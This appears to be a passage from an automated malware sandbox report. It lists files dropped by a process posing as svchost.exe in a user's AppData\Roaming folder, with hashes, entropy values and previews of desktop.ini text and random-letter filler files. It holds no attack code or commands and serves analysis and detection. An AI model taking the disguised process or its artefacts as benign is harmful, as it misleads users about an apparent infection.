                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5258560106596737
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                  MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                  SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                  SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                  SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.5218877566914193
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                  MD5:50A956778107A4272AAE83C86ECE77CB
                                                  SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                  SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                  SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):402
                                                  Entropy (8bit):3.493087299556618
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:
